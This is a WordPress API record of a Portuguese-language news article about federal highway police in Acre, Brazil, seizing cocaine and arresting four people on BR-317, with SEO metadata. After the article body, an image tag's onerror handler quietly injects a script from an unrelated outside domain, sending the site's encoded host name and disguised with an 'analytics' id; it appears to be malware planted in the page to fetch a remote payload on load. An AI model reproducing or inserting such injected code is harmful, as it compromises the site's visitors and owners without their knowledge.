{"id":51693,"date":"2020-12-07T16:11:29","date_gmt":"2020-12-07T16:11:29","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/12\/07\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/"},"modified":"2020-12-07T16:11:29","modified_gmt":"2020-12-07T16:11:29","slug":"quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/","title":{"rendered":"Quatro pessoas s\u00e3o presas por tr\u00e1fico de drogas na BR-317"},"content":{"rendered":"<p style=\"text-align: justify;\">Apreens\u00f5es e pris\u00f5es em Brasileia e Senador Guiomard<\/p>\n<p style=\"text-align: justify;\">Neste s\u00e1bado (5), a Pol\u00edcia Rodovi\u00e1ria Federal (PRF) realizou apreens\u00f5es de drogas e de ve\u00edculos e prendeu quatro pessoas. Os flagrantes aconteceram em cidades diferentes no interior do Acre.<\/p>\n<p style=\"text-align: justify;\">Na madrugada do s\u00e1bado, uma equipe da PRF realizava fiscaliza\u00e7\u00e3o de rotina na BR-317, quando recebeu a informa\u00e7\u00e3o de um poss\u00edvel tr\u00e1fico de drogas em um ve\u00edculo na dire\u00e7\u00e3o da cidade de Brasileia.<\/p>\n<p style=\"text-align: justify;\">O carro foi localizado dentro de uma resid\u00eancia com os port\u00f5es abertos. O ve\u00edculo tamb\u00e9m estava com as portas abertas e dentro de um fundo falso no painel foi apreendido cerca de 17 kg de coca\u00edna.<\/p>\n<p style=\"text-align: justify;\">O autom\u00f3vel e a droga foram apreendidos e encaminhados para a Delegacia de Pol\u00edcia Civil do munic\u00edpio.<\/p>\n<p style=\"text-align: justify;\">\n<p><img decoding=\"async\" class=\" size-full wp-image-51692\" src=\"https:\/\/nk7-testes.com.br\/wp-content\/uploads\/2020\/12\/07-12-20-Policiais_federais_fazem_apreensoes_2.jpg\" width=\"300\" height=\"169\" alt=\"07-12-20-Policiais federais fazem apreens\u00f5es 2\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p style=\"text-align: justify;\">O outro caso aconteceu, no km 97, da mesma rodovia, no munic\u00edpio de Senador Guiomard. Os policiais abordaram dois ve\u00edculos transportando drogas da fronteira para a capital.<\/p>\n<p style=\"text-align: justify;\">Em cada ve\u00edculo havia dois homens, e um deles se apresentou com uma identidade falsa para a equipe, por\u00e9m os policiais confirmaram que tinha sido forjado. Os outros homens estavam visivelmente nervosos e contradit\u00f3rios em rela\u00e7\u00e3o aos motivos da viagem para a fronteira.<\/p>\n<p style=\"text-align: justify;\">Uma vistoria nos ve\u00edculos revelou 10 kg de coca\u00edna dentro de uma mochila. Ap\u00f3s o flagrante, um dos homens confirmou que havia adquirido o entorpecente na fronteira e que tinha contratado os demais para auxili\u00e1-lo no transporte.<\/p>\n<p style=\"text-align: justify;\">Os dois ve\u00edculos e o entorpecente foram apreendidos, e os quatro suspeitos foram presos. Tr\u00eas deles tinham entre 21 e 24 anos e apenas um estava com 56 anos de idade.<\/p>\n<p style=\"text-align: justify;\">Todos foram encaminhados para a Delegacia de Pol\u00edcia Civil em Senador Guiomard, junto com as apreens\u00f5es.<\/p>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\">Apreens\u00f5es e pris\u00f5es em Brasileia e Senador Guiomard<\/p>\n","protected":false},"author":4,"featured_media":51691,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-51693","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Quatro pessoas s\u00e3o presas por tr\u00e1fico de drogas na BR-317 - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Quatro pessoas s\u00e3o presas por tr\u00e1fico de drogas na BR-317 - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Apreens\u00f5es e pris\u00f5es em Brasileia e Senador Guiomard\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-07T16:11:29+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/07-12-2020_prf-no-acre.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/\",\"name\":\"Quatro pessoas s\u00e3o presas por tr\u00e1fico de drogas na BR-317 - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/07-12-2020_prf-no-acre.jpg\",\"datePublished\":\"2020-12-07T16:11:29+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/07-12-2020_prf-no-acre.jpg\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/07-12-2020_prf-no-acre.jpg\",\"width\":458,\"height\":340,\"caption\":\"07-12-2020 prf-no-acre\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Quatro pessoas s\u00e3o presas por tr\u00e1fico de drogas na BR-317\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Quatro pessoas s\u00e3o presas por tr\u00e1fico de drogas na BR-317 - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/","og_locale":"pt_BR","og_type":"article","og_title":"Quatro pessoas s\u00e3o presas por tr\u00e1fico de drogas na BR-317 - Agazeta.net","og_description":"Apreens\u00f5es e pris\u00f5es em Brasileia e Senador Guiomard","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/","og_site_name":"Agazeta.net","article_published_time":"2020-12-07T16:11:29+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/07-12-2020_prf-no-acre.jpg","type":"image\/jpeg"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/","name":"Quatro pessoas s\u00e3o presas por tr\u00e1fico de drogas na BR-317 - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/07-12-2020_prf-no-acre.jpg","datePublished":"2020-12-07T16:11:29+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/07-12-2020_prf-no-acre.jpg","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/07-12-2020_prf-no-acre.jpg","width":458,"height":340,"caption":"07-12-2020 prf-no-acre"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/quatro-pessoas-sao-presas-por-trafico-de-drogas-na-br-317-no-acre\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Quatro pessoas s\u00e3o presas por tr\u00e1fico de drogas na BR-317"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51693","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=51693"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51693\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/51691"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=51693"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=51693"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=51693"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}